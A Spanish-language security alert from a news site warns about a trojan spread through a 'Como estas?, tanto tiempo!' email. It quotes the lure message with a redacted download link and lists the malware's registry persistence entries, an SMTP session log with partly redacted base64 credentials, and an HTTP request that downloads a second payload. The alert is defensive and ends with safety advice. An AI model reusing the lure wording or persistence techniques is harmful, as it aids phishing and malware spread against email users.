arbol de noticias logo

Árbol de Noticias

La información al alcance de todos

 

fotos roberto

Advertimos de nuevas variantes del este troyano que usa un llamativo asunto:
- Como estas?, tanto tiempo! -
El virus-troyano se auto-envía a los contactos que tenga el usuario en el Messenger.
Si usted recibe el siguiente correo electrónico o similares, tenga mucho cuidado;
From: "Esta dirección de correo electrónico está siendo protegida contra los robots de spam. Necesita tener JavaScript habilitado para poder verlo."
To:
Subject: Como estas?, tanto tiempo!


Y che como estas!! tanto tiempo!! el otro dia hable con Roberto..dice que ta todo bien..me paso unas fotos del y su mujer...me dijo que te pasara, descargalas de aca: http://XXXXXXX/fotos.zip ..tene cuidado a quien le mostras he! responde o conectate al MSN algun dia q hace tanto tiempo q no nos juntamos todos los gurises!

Nessun dorma


Si se descarga o dependiendo el navegador que use se auto-descarga y se ejecuta sin el consentimiento del usuario, sepa que es un troyano.

El troyano que se ejecuta es; Fotos roberto.exe de 66,5 KB

Al ejecutarse nos modifica el registro y cambia opciones del navegador:

-Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Cambiar svchost C:\WINDOWS\addins\svchost.exe
C:\WINDOWS\system\svchost.exe 08/06/2007 12:57:23

-C:\WINDOWS\system32\wbem\wmiprvse.exe
Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Agregar Upgrade

c:\windows\system32\winupgd.exe

-Internet Explorer:\\IESettings (MIMAQUINA) Cambiar Start Page http://prosXXXXXX.com about:blank


Crea un fichero llamado; mis contactos.txt
Este contiene los contactos de Messenger del usuario infectado, para ser usados en un reenvio.

Manda un correo electrónico y realiza una nueva descarga.

220 smtp-s1.antel.net.uy ESMTP Relay service (7.2.072.1) ready
EHLO MIMAQUINA
250-smtp-s1.antel.net.uy
250-8BITMIME
250-PIPELINING
250-HELP
250-AUTH=LOGIN
250-AUTH LOGIN CRAM-MD5 PLAIN
250-DELIVERBY 300
250 SIZE 30720000
AUTH LOGIN
334 VXNlcm5hbWU6
bWFyY2VkZWXXXXXXXXXXXXXXXXXXmV0LmNvbS51eQ==
334 UGXXXXXQ6


Descarga del nuevo fichero llamado: virus.zip

GET /virus.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: XXXXXX.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Server: Apache/2.0.59 (Unix) PHP/5.2.0
Location: http://XXXXXXX.com/
Content-Length: 219
Connection: close
Content-Type: text/html; charset=iso-8859-1

En realidad este fichero es un ejecutable llamado; virus.exe

En el servidor que contiene el malware se encuentra otros ficheros.

Advertimos que los anti-virus no lo detectan al ser una nueva variante pues tenga mucho cuidado.

Consejos y advertencias:

Si usted recibe un correo de un extraño, un correo no deseado, incluso este tipo de tarjetas les recomendamos la máxima prudencia y si es posible no haga caso de este tipo de correos electrónico y NUNCA pulsar sobre los enlaces que contiene.

Agradecemos a KiKiTo (Pitas Pitas Pitas, por el aviso).

Comisión de Seguridad en la Red
.
José María Luque Guerrero

Asociación de Internautas